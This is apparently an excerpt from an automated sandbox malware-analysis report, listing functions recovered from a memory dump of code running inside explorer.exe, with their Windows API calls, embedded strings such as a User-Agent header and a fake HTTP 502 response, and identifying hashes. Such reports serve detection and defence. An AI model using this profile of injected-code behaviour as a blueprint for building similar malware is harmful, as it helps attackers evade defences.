Part of subcall function 0156A1A3: CloseHandle.KERNEL32(?), ref: 0156A1E8
Part of subcall function 0156A1A3: RtlEnterCriticalSection.NTDLL(?), ref: 0156A1F4
Part of subcall function 0156A1A3: RtlLeaveCriticalSection.NTDLL(?), ref: 0156A21D
Part of subcall function 0156A1A3: CloseHandle.KERNEL32(?), ref: 0156A239
Part of subcall function 0156A1A3: LocalFree.KERNEL32(?), ref: 0156A247
Part of subcall function 0156A1A3: RtlDeleteCriticalSection.NTDLL(?), ref: 0156A251

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcatlstrcpy
String ID:
API String ID: 3259556694-0
Opcode ID: e9bbf8b63046d3e2e36abe5b24a32d90837f0454b4eca16e932186b107b6b646
Instruction ID: 3abbd3a7293948c73964010473d210435a073a0675d9e91c8f8d840692d27fa5
Opcode Fuzzy Hash: e9bbf8b63046d3e2e36abe5b24a32d90837f0454b4eca16e932186b107b6b646
Instruction Fuzzy Hash: 95F03C35642725BFD6315A7AAC0EF4E3E15FB86761F075010F614AF254CB714809A7A2

Uniqueness

Uniqueness Score: -1,00%

Function 01562464, Relevance: 7.5, APIs: 5, Instructions: 28COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000001,00000000,00000000,00000001,00000000,00000001,015624E4,00000000), ref: 01562475
TerminateProcess.KERNEL32(00000000,00000000), ref: 01562483
GetLastError.KERNEL32 ref: 0156248D
CloseHandle.KERNEL32(00000000), ref: 01562496
GetLastError.KERNEL32 ref: 0156249E

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorLastProcess$CloseHandleOpenTerminate
String ID:
API String ID: 83288655-0
Opcode ID: 35c57d00a280e0cb59d74bf990da65b6850ee67d650bdd8f13cdc83236f35c39
Instruction ID: 3e485a623685fbd3914ca0a0a26b52b10fb7bbef60f8287de53d8afb0e8decef
Opcode Fuzzy Hash: 35c57d00a280e0cb59d74bf990da65b6850ee67d650bdd8f13cdc83236f35c39
Instruction Fuzzy Hash: 93E065396011116BA331673D580DD6F7AADFBC5732B024014F929CF118DA30484996F1

Uniqueness

Uniqueness Score: -1,00%

Function 015416E1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 01541718

Part of subcall function 01561795: GetLocalTime.KERNEL32(?), ref: 0156179F
Part of subcall function 01561795: wsprintfA.USER32 ref: 015617CB

wsprintfA.USER32 ref: 0154173B

Part of subcall function 01552158: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,01541763,?,00000000,00000000,00000000,00000006), ref: 01552176
Part of subcall function 01552158: wsprintfA.USER32 ref: 01552194

HeapFree.KERNEL32(00000000,00000000,?), ref: 0154176C

Strings

| "%s" | %u, xrefs: 015416FE, 01541703, 01541736

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: wsprintf$HeapTime$AllocateFreeLocalSystem
String ID: | "%s" | %u
API String ID: 1069605159-3278422759
Opcode ID: 995c1970dabd59d0cc49a9ee83bb4f34a2109e7be5beacfb97bde7ecb1c1e0c4
Instruction ID: 1dcfb14bb7b57b4b98b74d3c47d9b7dc1a87cdbc9937a7e276524e29d1a15df9
Opcode Fuzzy Hash: 995c1970dabd59d0cc49a9ee83bb4f34a2109e7be5beacfb97bde7ecb1c1e0c4
Instruction Fuzzy Hash: BC11A07150011DFFDB209B69DC88DAA7FAEFB85269F110022F918DF210E6719D49ABA0

Uniqueness

Uniqueness Score: -1,00%

Function 0154450A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00010000), ref: 01544527

Part of subcall function 01552747: GetLastError.KERNEL32(?,00000000,0156E0A8,000000FF,00000000,?,?,01543B7F,0000011A,00000000,?), ref: 01552789
Part of subcall function 01552747: CloseHandle.KERNEL32(000000FF), ref: 01552794

lstrlen.KERNEL32(EMPTY,?,00000000,?,00000000,?), ref: 0154455D
HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 01544577

Strings

EMPTY, xrefs: 01544557, 0154455C, 01544564

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrlen
String ID: EMPTY
API String ID: 450629115-1696604233
Opcode ID: 9abbab099c9e526fdcbad5c4abb01e3c9cbfd3d76eb1fa1948593aad308e10b3
Instruction ID: 0bb5c06c8b558f343a908bbb0301750eed82175f3f1478756b9f7e58bff2c7f6
Opcode Fuzzy Hash: 9abbab099c9e526fdcbad5c4abb01e3c9cbfd3d76eb1fa1948593aad308e10b3
Instruction Fuzzy Hash: AD017C76500148BFDF229BA9DC48DAF7B6DFB85664B114026F918DB214D6724E04E7A0

Uniqueness

Uniqueness Score: -1,00%

Function 01547F6F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(User-Agent:,00000000,?,00000000,?,?,?,01553F7D,?,?,01598FD4), ref: 01547F82
RtlAllocateHeap.NTDLL(00000000,01598FD5), ref: 01547FBE
lstrcpyn.KERNEL32(00000000,?,01598FD5,?,?,?,01553F7D,?,?,01598FD4), ref: 01547FCF

Strings

User-Agent:, xrefs: 01547F7A, 01547F7F, 01547F88

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AllocateHeaplstrcpynlstrlen
String ID: User-Agent:
API String ID: 152504898-84083332
Opcode ID: 696ad3ff997e9ef65435bc76d495dc51b7206bbb6c7dce265426cfd19397658e
Instruction ID: 4ec671e13882d82cd97c3071d7a804ee97cb95f96250faab298bf40b6cf0d3b5
Opcode Fuzzy Hash: 696ad3ff997e9ef65435bc76d495dc51b7206bbb6c7dce265426cfd19397658e
Instruction Fuzzy Hash: A801713690130AFFDB208FE9DC49A9EBFB9FF49218F114469E516AB110C7709E04EB60

Uniqueness

Uniqueness Score: -1,00%

Function 0154D735, Relevance: 6.5, APIs: 5, Instructions: 275COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,000001F8,?,?,?,-00000001), ref: 0154D796
memcpy.NTDLL(?,00000000,00000020,000001F8,?,?,?,-00000001), ref: 0154D8B5
LocalFree.KERNEL32(00000000,000001F8,?,?,?,-00000001), ref: 0154DA69

Part of subcall function 0154D2AD: memcpy.NTDLL(?,?,00000010), ref: 0154D2BC

memcpy.NTDLL(?,00000000,00000018,000001F8,?,?,?,-00000001), ref: 0154D984
memcpy.NTDLL(?,00000000,00000018,000001F8,?,?,?,-00000001), ref: 0154D9CA

Part of subcall function 0154D2F0: memcpy.NTDLL(?,?,0000000C), ref: 0154D2FF

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$FreeLocal
String ID:
API String ID: 2365274387-0
Opcode ID: de5a4e9f356817feb759dbe7d33a20c7485850bf729480f49eb1dda6fcdd32c2
Instruction ID: d0188a7ceea6d5ff2bf4eda784c0fa792e014424bbf68cf467ab5ae03b16ac9b
Opcode Fuzzy Hash: de5a4e9f356817feb759dbe7d33a20c7485850bf729480f49eb1dda6fcdd32c2
Instruction Fuzzy Hash: 3FB17D31A0024ADFEF15CFA8C881AEEBBF1FF58318F148569E919AB201D775DA51CB40

Uniqueness

Uniqueness Score: -1,00%

Function 01542F17, Relevance: 6.4, APIs: 5, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 01542F7D
CloseHandle.KERNEL32(?), ref: 01542FC8
memcpy.NTDLL(00000000,00000098,00000000,00000000), ref: 01543002
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01543135
GetLastError.KERNEL32(?,00000000,00000000), ref: 0154339B

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CloseErrorFreeHandleHeapLastmemcpymemset
String ID:
API String ID: 1266464030-0
Opcode ID: 638804ab7e2e4c7606d81f37178629563a877a026a369aa268ef49ad4439e6ae
Instruction ID: 5f5ebad357ff3419d607136b08a7fc4019cf97aad29cc0c8af3c45d4d85a64fc
Opcode Fuzzy Hash: 638804ab7e2e4c7606d81f37178629563a877a026a369aa268ef49ad4439e6ae
Instruction Fuzzy Hash: 15513831104226FBEBB1AF688C44F6E3AA9BFD075CF014825F9299E260EF71C544D762

Uniqueness

Uniqueness Score: -1,00%

Function 0154EBF7, Relevance: 6.4, APIs: 5, Instructions: 133COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,0154D075,?,?,00000061,00000000), ref: 0154EC3C
memcpy.NTDLL(?,?,00000004,?,?,?,?,00000000,00000000,00000000), ref: 0154EC53
memcpy.NTDLL(?,00000002,00000018,?,?,?,?,?,00000000,00000000,00000000), ref: 0154EC9D
memcpy.NTDLL(0154D075,00000002,0000000C,00000000,00000000,00000000,?,?,?,?,?,?,?,0154D075,?,?), ref: 0154ECB2
LocalFree.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,0154D075,?,?,00000061,00000000), ref: 0154ED59

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$FreeLocal
String ID:
API String ID: 2365274387-0
Opcode ID: fe23f31dd2765a7c7bba0357f1a5cf5f27c3de2b8f305def41f0d540af23485a
Instruction ID: 28dd74e7cf75d15a54cc4d8e618d6cba00485bee19223fad30577868b98b1be1
Opcode Fuzzy Hash: fe23f31dd2765a7c7bba0357f1a5cf5f27c3de2b8f305def41f0d540af23485a
Instruction Fuzzy Hash: 84514A71D0020AEFDF20DF98C8829ADBBF5FF48318F04886AE655AB210D3359A54DF95

Uniqueness

Uniqueness Score: -1,00%

Function 01549BE5, Relevance: 6.4, APIs: 5, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 01549C4A
memcpy.NTDLL(00000009,?,00000005), ref: 01549C76
memcpy.NTDLL(00000009,?,?), ref: 01549C95
LocalFree.KERNEL32(?), ref: 01549CE2
LocalFree.KERNEL32(00000001,00000001,015498E1,-00000009,015498EA,?,?,?,?,015498EA,?,00000001), ref: 01549F36

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Local$Freememcpy$Alloc
String ID:
API String ID: 101766447-0
Opcode ID: da294c099ac8b0ae2bc17f8592fe32c5a8e85cbc44d4c51e2992d829ac42c58b
Instruction ID: 8fc55a821bf6f51a215fde609d47aef273a3ab93430c8e214eded090e249cf21
Opcode Fuzzy Hash: da294c099ac8b0ae2bc17f8592fe32c5a8e85cbc44d4c51e2992d829ac42c58b
Instruction Fuzzy Hash: 2C51E171200242CFEB15CF28C896BAA7BE1FF49318F088469E9A6CF256E738D515DF50

Uniqueness

Uniqueness Score: -1,00%

Function 0154B68F, Relevance: 6.4, APIs: 5, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,00000002), ref: 0154B6FF
HeapFree.KERNEL32(00000000,?,?), ref: 0154B76A
HeapFree.KERNEL32(00000000,?,?), ref: 0154B786
HeapFree.KERNEL32(00000000,?,?), ref: 0154B79E

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5c636e03de8b2ad2a681f916c1c73d7d12e121d26948ae42cb230584738fe2cf
Instruction ID: 1364a55f09edbd5c0fc9963056ef8e26d103851fcaaea32367626f876ff1713a
Opcode Fuzzy Hash: 5c636e03de8b2ad2a681f916c1c73d7d12e121d26948ae42cb230584738fe2cf
Instruction Fuzzy Hash: 73416C7590020AFFEF21DFA8C9C44ADBBB1FF08358B554429EA15AB610C731EDA4DB90

Uniqueness

Uniqueness Score: -1,00%

Function 0155141C, Relevance: 6.3, APIs: 5, Instructions: 96memorystringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 01551447

Part of subcall function 01551035: LocalFree.KERNEL32(?,?,0156EB34,?,?,?), ref: 015510FB

Part of subcall function 01551035: LocalFree.KERNEL32(00000000,?,0156EB34,?,?,00000000), ref: 015511B7
Part of subcall function 01551035: LocalFree.KERNEL32(?,?,80000001,01598164,00000000,?,000007FF,80000001,00000000), ref: 015511C0
Part of subcall function 01551035: LocalFree.KERNEL32(?,?,00000000), ref: 01551279

lstrlen.KERNEL32(01551586), ref: 015514A9
LocalAlloc.KERNEL32(00000040,?), ref: 015514BC
wsprintfA.USER32 ref: 015514D4
LocalFree.KERNEL32(00000000,80000001,?,00000000), ref: 015514EE

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Local$Free$Alloclstrlenmemsetwsprintf
String ID:
API String ID: 3436184281-0
Opcode ID: f5404b4164e85c9c9e69debfa3ca9873d17eb95cca8f4da6425c12f259e578d1
Instruction ID: 576f3ad007919b8682c64ae1f3c55af424fc67ff5b0c935473d92e6581961725
Opcode Fuzzy Hash: f5404b4164e85c9c9e69debfa3ca9873d17eb95cca8f4da6425c12f259e578d1
Instruction Fuzzy Hash: 6531277690010DBFEF119F94CC84EEE7FBDFF08254F048466FA25AA020DB318A559BA1

Uniqueness

Uniqueness Score: -1,00%

Function 0154F524, Relevance: 6.3, APIs: 5, Instructions: 78COMMON

Download Yara Rule

APIs

memcpy.NTDLL(0154F301,0154F301,00000000,00000000,0010C2C9,00000059,00000000,0154F4E3,?,?,?,0154F301,?,00000059,0156E0D8,?), ref: 0154F552
memmove.NTDLL(8BF18B56,00000000,00000000,0154F301,8BF18B56,00000059,00000000,0154F4E3,?,?,?,0154F301,?,00000059,0156E0D8,?), ref: 0154F583
memcpy.NTDLL(0154F301,0154F315,8BF18B56), ref: 0154F592
memcpy.NTDLL(0154F315,00000000,00000000,00000059,00000000,0154F4E3,?,?,?,0154F301,?,00000059,0156E0D8,?,00000061), ref: 0154F5B9
LocalFree.KERNEL32(00000000,00000059,00000000,0154F4E3,?,?,?,0154F301,?,00000059,0156E0D8,?,00000061), ref: 0154F5D2

Part of subcall function 0154CC7B: LocalReAlloc.KERNEL32(0154F301,0154F301,00000002,0154F579,0154F301,8BF18B56,00000059,00000000,0154F4E3,?,?,?,0154F301,?), ref: 0154CC8C

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$Local$AllocFreememmove
String ID:
API String ID: 820329114-0
Opcode ID: 77094e13abd398bfdb60ab0a10f68da0f838b4065455ea7e2b9ed8e66daf4740
Instruction ID: 00e46299de9e029263e1aee707c042bafaffd90011584643b43f6302b88d2716
Opcode Fuzzy Hash: 77094e13abd398bfdb60ab0a10f68da0f838b4065455ea7e2b9ed8e66daf4740
Instruction Fuzzy Hash: AE215EB16016029FEB24DF6DC884E6677FAFFD9214704892DE556CB610EB31E418CB91

Uniqueness

Uniqueness Score: -1,00%

Function 015535C3, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 257stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,0159AC40,0000001A,?,?), ref: 015536DD
lstrlen.KERNEL32(HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout,00000000,?,?,?,01598FD4,?,?,01546B11,?,?), ref: 0155363C

Part of subcall function 015693E6: RtlLeaveCriticalSection.NTDLL(00000000), ref: 01569463

memset.NTDLL ref: 015537FF

Strings

HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout, xrefs: 01553634, 01553643

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalLeaveSectionlstrlenmemcpymemset
String ID: HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout
API String ID: 928877937-2598440336
Opcode ID: f23b7fb940638cdf248c5db66fa579f15aeb976faa4cfffb941b6d7b8716fc9d
Instruction ID: d2328b188ff29d60a616425ed36402ed0570c9fb221188af665b7ac3ff53e515
Opcode Fuzzy Hash: f23b7fb940638cdf248c5db66fa579f15aeb976faa4cfffb941b6d7b8716fc9d
Instruction Fuzzy Hash: 5391B471601112ABDB919F2CCD94E9D7BA9FF88794F04812AFD0A8F651D730E921CB90

Uniqueness

Uniqueness Score: -1,00%

Function 0154C143, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 198stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0154C53C,00000000), ref: 0154C194
lstrlenW.KERNEL32(0154C53C,80000001,0156E8B0,?,?,00000000), ref: 0154C2D6
LocalFree.KERNEL32(?), ref: 0154C358

Strings

%02X, xrefs: 0154C20F, 0154C221, 0154C251

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: lstrlen$FreeLocal
String ID: %02X
API String ID: 1884169789-436463671
Opcode ID: 728420baeba02bab3c4b694bb1b830704619d848f29231cc0b0ace9c7ea51184
Instruction ID: 5c7142c657ef7c153bc85f6fd1ec4fb7ba64cf79bc3c2b2bc77ce133701a6426
Opcode Fuzzy Hash: 728420baeba02bab3c4b694bb1b830704619d848f29231cc0b0ace9c7ea51184
Instruction Fuzzy Hash: A171BC71E01209AFDF219FA4D884DEEBFB9FFC8304F14802AE611AB250D7759A45DB60

Uniqueness

Uniqueness Score: -1,00%

Function 01543B04, Relevance: 6.2, APIs: 4, Instructions: 163memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 01544626: RtlAllocateHeap.NTDLL(00000000,0159A213), ref: 01544677

RtlAllocateHeap.NTDLL(00000000,00010000,0159A21B), ref: 01543B64
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 01543C63
wsprintfA.USER32 ref: 01543C77
lstrlen.KERNEL32(?,00000000), ref: 01543C84

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AllocateHeap$lstrlenwsprintf
String ID:
API String ID: 1501708470-0
Opcode ID: c6cb0f6f6a967c1f59aefa0660c922497ee0d8539cc9fd93cbb3bc8e18e82ae3
Instruction ID: 9185cae9909fac44b5e9176b9bd84ee97e2d90b08d2355c5ad52cef22d9bd466
Opcode Fuzzy Hash: c6cb0f6f6a967c1f59aefa0660c922497ee0d8539cc9fd93cbb3bc8e18e82ae3
Instruction Fuzzy Hash: DE513BB1D0021AEFEF51DFA9CC859BEBBB9FF44348F11006AE610AB220D7714D549B61

Uniqueness

Uniqueness Score: -1,00%

Function 015624F4, Relevance: 6.1, APIs: 4, Instructions: 136stringCOMMON

Download Yara Rule

APIs

Part of subcall function 01541566: RtlAllocateHeap.NTDLL(00000000,?,015606B7), ref: 01541572

memset.NTDLL ref: 01562522
_strupr.NTDLL ref: 015625A9
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 015625FA
lstrlen.KERNEL32(?,00000000,?,?,?,0156E0A8,?,00000000,?), ref: 01562619

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AllocateHeap_struprlstrlenmemcpymemset
String ID:
API String ID: 3552967949-0
Opcode ID: 21501d72af2f145e1f720f1248156d51df3ecf8eaf532bcc681cac3719ce018d
Instruction ID: a31ce394640b3942d4fc598f6e7653d5889e225dfe9acd07838f9477c9138e25
Opcode Fuzzy Hash: 21501d72af2f145e1f720f1248156d51df3ecf8eaf532bcc681cac3719ce018d
Instruction Fuzzy Hash: F9417F716043069FE321AF29CD85B1ABBECFF65640F050819F95ADF241EB74E9058BA2

Uniqueness

Uniqueness Score: -1,00%

Function 01556A94, Relevance: 6.1, APIs: 4, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 01544009: GetFileAttributesW.KERNEL32(?,?,01556AA7,00000000,00000000,0156E0D8,01556CAB,?,00000000,?,00000000,?), ref: 01544016

Part of subcall function 01543D31: lstrlenW.KERNEL32(?,01556AC4,00000000,00000000,0156E0D8,01556CAB,?,00000000,?,00000000,?), ref: 01543D3C

GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 01556B42
GetPrivateProfileStringW.KERNEL32(00000000,0156F000,0156E774,?,00000FFF,?), ref: 01556B81
GetPrivateProfileIntW.KERNEL32(00000000,0156EFE8,00000001,?), ref: 01556B96
lstrlenW.KERNEL32(00000000), ref: 01556BEB

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: PrivateProfile$lstrlen$AttributesFileNamesSectionString
String ID:
API String ID: 1627123966-0
Opcode ID: a02c8470876180a3a53e0dc88cadff1cf88d7c84a74222617d599dcb6d29b0ed
Instruction ID: ef778e2788045dfef9a625f2a25f842e13529375d942cd2b232567de81cf2c86
Opcode Fuzzy Hash: a02c8470876180a3a53e0dc88cadff1cf88d7c84a74222617d599dcb6d29b0ed
Instruction Fuzzy Hash: BA41A23090029BBBEF62AF69CC21E6E7BB9FF50754F444026FD10AE160DB71C951AB91

Uniqueness

Uniqueness Score: -1,00%

Function 01545756, Relevance: 6.1, APIs: 4, Instructions: 122memorysynchronizationCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,00000008), ref: 0154581B
WaitForSingleObject.KERNEL32(00000000), ref: 01545880
HeapFree.KERNEL32(00000000,00000103), ref: 015458A9
HeapFree.KERNEL32(00000000,?), ref: 015458B9

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FreeHeap$ObjectSingleWait
String ID:
API String ID: 3267977683-0
Opcode ID: f6b1f0de03b11550366cff6d273e4b84ca29869b2db58880ea595606be8a5e87
Instruction ID: dc3f38beacaf4314e5f480e8c90932719254e10dea368ff6def1291d44575f62
Opcode Fuzzy Hash: f6b1f0de03b11550366cff6d273e4b84ca29869b2db58880ea595606be8a5e87
Instruction Fuzzy Hash: 4A41F975C0010DFFDF228F99D8448EEBFBAFB45344F218026F515AA225E7718A94EB91

Uniqueness

Uniqueness Score: -1,00%

Function 015556E9, Relevance: 6.1, APIs: 4, Instructions: 122memorysynchronizationCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000), ref: 015557F7
RtlRemoveVectoredExceptionHandler.NTDLL(01598F94), ref: 01555818
ReleaseMutex.KERNEL32(01598F8C,?,?,0154162E), ref: 01555828

Part of subcall function 0154157B: HeapFree.KERNEL32(00000000,?,015606F9), ref: 01541587

LocalFree.KERNEL32(?,?,0154162E), ref: 0155585B

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Free$Heap$ExceptionHandlerLocalMutexReleaseRemoveVectored
String ID:
API String ID: 4081137899-0
Opcode ID: cb282b59985ffe2bd7e8769eccebd2e2ef62ac36b03bb2c1d08a1981622a3f83
Instruction ID: 58634e76e5278fd19b447654176fc56da3fd50333b41d3e28c9dcd7c4744ce0e
Opcode Fuzzy Hash: cb282b59985ffe2bd7e8769eccebd2e2ef62ac36b03bb2c1d08a1981622a3f83
Instruction Fuzzy Hash: 26417135620209DFE7709F69EC9492A3BABFB85350717102AEB35CF118E7319849EB12

Uniqueness

Uniqueness Score: -1,00%

Function 0156A6FC, Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

_strupr.NTDLL ref: 0156A743
_strupr.NTDLL ref: 0156A794
_strupr.NTDLL ref: 0156A7CF
_strupr.NTDLL ref: 0156A805

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: _strupr
String ID:
API String ID: 3408778250-0
Opcode ID: 5dd74778fda00e816786706407f44a96b6dd7abccf72e47b64416f9ef3515729
Instruction ID: 0dfbc63b31cd584bc2fa0ff22ce48d025e341abe09c35255f31f7acbd66aa9ab
Opcode Fuzzy Hash: 5dd74778fda00e816786706407f44a96b6dd7abccf72e47b64416f9ef3515729
Instruction Fuzzy Hash: 7D415F7280020A9FDF25DFA8D884AAEB7BDFF50340F104526E825EB155D778E849CBE1

Uniqueness

Uniqueness Score: -1,00%

Function 0154C45D, Relevance: 6.1, APIs: 4, Instructions: 82stringmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000880), ref: 0154C494
lstrlenW.KERNEL32(00000000), ref: 0154C4F6
lstrcpyW.KERNEL32(00000000,0156E808), ref: 0154C50D
lstrcatW.KERNEL32(00000000,0000000E), ref: 0154C518

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AllocLocallstrcatlstrcpylstrlen
String ID:
API String ID: 3822144076-0
Opcode ID: e874dd2d80a453c64586e127f5047c024430618e2d5ef88e8cfe0ea37553bb08
Instruction ID: a76876a551f53f6122ea671230cb476801681465fb558513a5388112482a2912
Opcode Fuzzy Hash: e874dd2d80a453c64586e127f5047c024430618e2d5ef88e8cfe0ea37553bb08
Instruction Fuzzy Hash: 3C21B075602109BFDB22EB94DC49FEE3BBCFF85714F004024FA15EA050DB749A49ABA5

Uniqueness

Uniqueness Score: -1,00%

Function 0154722E, Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 01547256
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0154729D
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 015472E9
CloseHandle.KERNEL32(000000FF), ref: 0154730F

Part of subcall function 0154731F: GetTickCount.KERNEL32(00000000,00000000,00000000,?,01542F91,00000000), ref: 0154732F
Part of subcall function 0154731F: CreateFileW.KERNEL32(01542F91,80000000,00000003,01599084,00000003,00000000,00000000), ref: 0154734C
Part of subcall function 0154731F: GetFileSize.KERNEL32(01542F91,00000000,0159A422,00000001,?,01542F91,00000000), ref: 01547378
Part of subcall function 0154731F: CreateFileMappingA.KERNEL32(01542F91,01599084,00000002,00000000,00000000,01542F91), ref: 0154738C
Part of subcall function 0154731F: lstrlen.KERNEL32(01542F91,?,01542F91,00000000), ref: 015473A8
Part of subcall function 0154731F: lstrcpy.KERNEL32(?,01542F91), ref: 015473B8
Part of subcall function 0154731F: HeapFree.KERNEL32(00000000,01542F91), ref: 015473D3
Part of subcall function 0154731F: CloseHandle.KERNEL32(01542F91), ref: 015473E5

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 7fcaa85d2dd0fec981824c3ad8e17a6ff2ef8d86860770b7db0543664fa7d269
Instruction ID: f3e472cabf26289700d887282386535f1a20ba46e898e3e6f8f6fdf23654f2a5
Opcode Fuzzy Hash: 7fcaa85d2dd0fec981824c3ad8e17a6ff2ef8d86860770b7db0543664fa7d269
